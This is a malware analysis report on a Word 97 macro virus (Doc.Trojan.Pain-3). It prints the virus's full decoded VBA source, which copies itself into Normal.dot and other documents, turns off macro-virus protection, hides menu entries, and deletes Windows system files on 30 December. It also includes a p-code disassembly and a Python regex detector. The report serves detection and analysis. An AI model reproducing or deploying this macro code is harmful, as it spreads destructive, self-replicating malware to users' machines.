Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 967811803482783b…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 2001-08-07 14:10:00
Authoring application: Microsoft Word 8.0
First seen: 2015-10-02
MD5: d7c5a5196569da081d2294c5d9e677c0
SHA-1: 80647b84868583f0da8ce0d11a4372c48478f19e
SHA-256: 967811803482783bb70a195f0da20b2d187264ff63b396a40adedcc31b4ccae3
Risk score: 168

Heuristics (5)

  • ClamAV: Doc.Trojan.Pain-3 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pain-3. The family name agrees with the tag the macro itself writes into the document's Keywords property ("Word97-2k.Macro.PAIN", see the extracted source below).
  • VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code: a single module, Macros/VBA/ThisDocument (2828 bytes), decoded into macros.bas below.
  • VBA macro-virus self-replication / AV tampering (critical) OLE_VBA_MACRO_VIRUS_REPLICATION
    The VBA macro rewrites VBA project code through the VBE object model (CodeModule DeleteLines/InsertLines/AddFromString, VBComponents, or OrganizerCopy) to copy itself into the global template (Normal.dot) and into other open documents, and/or disables Word's macro-virus warning (Options.VirusProtection = False). This is the defining behavior of the W97M macro-virus family: self-replicating code with no benign document use, flagged independently of any AV signature.
    In this sample the AutoClose routine reads its own module text (MacroContainer.VBProject ... CodeModule.Lines), compares it with the first module of NormalTemplate and then of ActiveDocument, and wherever the text differs deletes every line and inserts its own, so Normal.dot is infected first and every document closed afterwards is infected from it. It also sets VirusProtection, ConfirmConversions and SaveNormalPrompt to 0 so the infected template is saved without a prompt, disables Ctrl+Break with Application.EnableCancelKey = Not -1 (wdCancelDisabled), runs under On Error Resume Next, and restores ActiveDocument.Saved afterwards so the host document does not appear modified.
    Matched line in script
    Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
  • Auto_Close macro (low) OLE_VBA_AUTOCLOSE
    Auto_Close macro: a procedure named AutoClose runs automatically when the document is closed. Low severity on its own, but here it is the only entry point, so a sandbox that opens the document and never closes it will not observe the infection or the payload.
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    Stock description: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. On this sample the stock text does not hold as written: the VBA project was recovered (macros.bas below) and the stronger OLE_VBA_MACRO_VIRUS_REPLICATION marker did fire, so treat this as redundant string-level evidence of the AutoClose name rather than as an independent finding.

Not covered by any of the five heuristics above, but visible in the extracted source: a date-triggered destructive payload (if the locale-formatted short date starts with "30.12", that is 30 December under a dd.mm date format, the macro issues Kill on C:\Windows\System\*.* and C:\Windows\*.*; under an mm/dd format the condition never matches), and menu tampering that walks the sixth top-level menu of "Menu Bar" (Tools in English Word 97) and deletes any popup containing an item whose caption ends in "Basic", intended to hide the Tools > Macro entries; note that it deletes the parent popup (Control), not the single item. The Keywords tag "Word97-2k.Macro.PAIN" written into the document summary is a usable hunting term for infected documents and templates.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5280 bytes
SHA-256: e11cf9c7833e45adc555e31d312ea7b249a3d3c2f121582747bc0077697db348
Preview script
First 1,000 lines of the extracted script: the decoded VBA source of the ThisDocument module, followed (from the "' Processing file:" line on) by a pcodedmp-style p-code disassembly appended as VBA comment lines. The disassembly resolves three identifiers differently from the source (Then for Text, TypeOf for Type, LBound for Left); each is a built-in name neighbouring the expected one, which most likely reflects the disassembler's identifier table for this Word 97 project rather than a stomped module, but source/p-code disagreement is exactly the check that catches VBA stomping, so confirm it before trusting either listing.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub AutoClose()
On Error Resume Next
S = ActiveDocument.Saved
DisableAutoMacro = False
Text = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Countoflines)
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Left(Date, 5) = "30.12" Then Kill ("C:\Windows\System\*.*"): Kill ("C:\Windows\*.*")
Set Mac = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then
Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
For Each Control In CommandBars("Menu Bar").Controls(6).Controls
If Control.Type = 10 Then
For I = 1 To Control.Controls.Count
If Right(Control.Controls(I).Caption, 5) = "Basic" Then Control.Delete
Next I
End If
Next Control
End If
Set Mac = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
With Dialogs(wdDialogFileSummaryInfo): .Keywords = "Word97-2k.Macro.PAIN": .Execute: End With
If ActiveDocument.Path <> "" Then ActiveDocument.Save
ActiveDocument.Saved = S
End Sub
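The heuristics above re-implemented as plain regexes and run over the AutoClose routine from the listing, as an added example; this is not the analyzer's or oletools' code, and the rule names and severities are this example's own labels, not oletools or ClamAV identifiers. In practice the source text comes from olevba (the report's artifact source, oletools.olevba.extract_macros); that dependency is left out so the script runs stand-alone on the embedded copy. It goes a little beyond the report's five heuristics: it also flags the date-triggered Kill and the menu tampering, lists the auto-exec entry points (so you can tell whether a sandbox must close the document), and pulls the Keywords tag out as a hunting term.

```python
"""Re-run the report's VBA heuristics as plain regexes over decoded macro source.

Added example, not code from the analyzer or from oletools. Rule names and
severities are this example's own labels, not oletools or ClamAV identifiers.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Sample input: the AutoClose routine copied from the extracted macros.bas above.
SAMPLE_VBA = r'''Sub AutoClose()
On Error Resume Next
S = ActiveDocument.Saved
DisableAutoMacro = False
Text = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Countoflines)
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Left(Date, 5) = "30.12" Then Kill ("C:\Windows\System\*.*"): Kill ("C:\Windows\*.*")
Set Mac = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then
Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
For Each Control In CommandBars("Menu Bar").Controls(6).Controls
If Control.Type = 10 Then
For I = 1 To Control.Controls.Count
If Right(Control.Controls(I).Caption, 5) = "Basic" Then Control.Delete
Next I
End If
Next Control
End If
Set Mac = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
With Dialogs(wdDialogFileSummaryInfo): .Keywords = "Word97-2k.Macro.PAIN": .Execute: End With
If ActiveDocument.Path <> "" Then ActiveDocument.Save
ActiveDocument.Saved = S
End Sub
'''


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line_no: int  # 1-based line in the decoded source
    line: str


# (rule, severity, pattern), applied line by line, case-insensitively.
RULES = (
    ("VBA_AUTOEXEC", "medium",
     r"^\s*(?:Public\s+|Private\s+)?Sub\s+(Auto_?(?:Open|Close|Exec|New|Exit)|Document_(?:Open|Close|New))\b"),
    ("VBE_OBJECT_MODEL", "medium", r"\.VBProject\b"),
    ("VBE_CODE_REWRITE", "critical", r"\b(?:AddFromString|InsertLines|DeleteLines|OrganizerCopy)\b"),
    ("NORMAL_TEMPLATE_INFECTION", "critical", r"\bNormalTemplate\.VBProject\b"),
    ("AV_TAMPERING", "critical", r"\.VirusProtection\s*=\s*(?:0|False)\b"),
    ("ANTI_INTERRUPT", "medium", r"\.EnableCancelKey\s*=|^\s*On\s+Error\s+Resume\s+Next\b"),
    ("UI_TAMPERING", "medium", r"\bCommandBars\s*\(|\bControl\.Delete\b"),
    ("DESTRUCTIVE_FILE_OP", "critical", r'\bKill\s*\(?\s*"'),
    ("DATE_TRIGGER", "high", r"^\s*If\b.*\b(?:Date|Now|Day|Month|Year|Weekday)\b.*\bThen\b"),
)
_COMPILED = [(rule, sev, re.compile(pat, re.IGNORECASE)) for rule, sev, pat in RULES]
_AUTOEXEC = re.compile(RULES[0][2], re.IGNORECASE | re.MULTILINE)


def triage(vba_source: str) -> list[Finding]:
    """Every (rule, line) hit in source order; one line may hit several rules."""
    return [
        Finding(rule, sev, no, line.strip())
        for no, line in enumerate(vba_source.splitlines(), start=1)
        for rule, sev, rx in _COMPILED
        if rx.search(line)
    ]


def verdict(findings: list[Finding]) -> str:
    """'malicious' if any critical rule fired, 'suspicious' for lesser hits, else 'clean'."""
    if not findings:
        return "clean"
    return "malicious" if any(f.severity == "critical" for f in findings) else "suspicious"


def entry_points(vba_source: str) -> list[str]:
    """Auto-executing procedure names; if only AutoClose is present, a sandbox must close the document."""
    return [m.group(1) for m in _AUTOEXEC.finditer(vba_source)]


def infection_markers(vba_source: str) -> list[str]:
    """Literals written into document properties; W97M families tag infected files this way."""
    return re.findall(r'\.(?:Keywords|Comments|Title|Subject)\s*=\s*"([^"]*)"', vba_source, re.IGNORECASE)


if __name__ == "__main__":
    hits = triage(SAMPLE_VBA)
    for f in hits:
        print(f"{f.severity:8} {f.rule:26} line {f.line_no:2}: {f.line[:70]}")
    print("verdict:", verdict(hits))
    print("entry points:", entry_points(SAMPLE_VBA))
    print("infection markers:", infection_markers(SAMPLE_VBA))
```

Per-line regexes are deliberately crude: they produce the same verdict as the report on this sample, but a virus that builds its method names from string fragments or uses CallByName would slip past them, which is why the report also keys on the VBE object-model access itself and not only on the method names.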



' Processing file: /opt/analyzer/scan_staging/e4e4877f01a94d31ad47d75ec4be565d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2828 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub AutoClose())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St S 
' Line #4:
' 	LitVarSpecial (False)
' 	St DisableAutoMacro 
' Line #5:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd Countoflines 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St Then 
' Line #6:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #7:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0000 
' 	EndWith 
' Line #8:
' 	Ld Date 
' 	LitDI2 0x0005 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0005 "30.12"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0015 "C:\Windows\System\*.*"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	BoS 0x0000 
' 	LitStr 0x000E "C:\Windows\*.*"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set Mac 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Then 
' 	Ne 
' 	IfBlock 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld Then 
' 	Ld Mac 
' 	ArgsMemCall AddfromString 0x0001 
' Line #12:
' 	StartForVariable 
' 	Ld Control 
' 	EndForVariable 
' 	LitDI2 0x0006 
' 	LitStr 0x0008 "Menu Bar"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemLd Controls 
' 	ForEach 
' Line #13:
' 	Ld Control 
' 	MemLd TypeOf 
' 	LitDI2 0x000A 
' 	Eq 
' 	IfBlock 
' Line #14:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Control 
' 	MemLd Controls 
' 	MemLd Count 
' 	For 
' Line #15:
' 	Ld I 
' 	Ld Control 
' 	ArgsMemLd Controls 0x0001 
' 	MemLd Caption 
' 	LitDI2 0x0005 
' 	ArgsLd Right 0x0002 
' 	LitStr 0x0005 "Basic"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld Control 
' 	ArgsMemCall Delete 0x0000 
' 	EndIf 
' Line #16:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	NextVar 
' Line #17:
' 	EndIfBlock 
' Line #18:
' 	StartForVariable 
' 	Ld Control 
' 	EndForVariable 
' 	NextVar 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set Mac 
' Line #21:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Then 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld Then 
' 	Ld Mac 
' 	ArgsMemCall AddfromString 0x0001 
' 	EndIf 
' Line #22:
' 	StartWithExpr 
' 	Ld wdDialogFileSummaryInfo 
' 	ArgsLd Dialogs 0x0001 
' 	With 
' 	BoS 0x0000 
' 	LitStr 0x0014 "Word97-2k.Macro.PAIN"
' 	MemStWith Keywords 
' 	BoS 0x0000 
' 	ArgsMemCallWith Execute 0x0000 
' 	BoS 0x0000 
' 	EndWith 
' Line #23:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #24:
' 	Ld S 
' 	Ld ActiveDocument 
' 	MemSt Saved 
' Line #25:
' 	EndSub 
' Line #26:
' Line #27: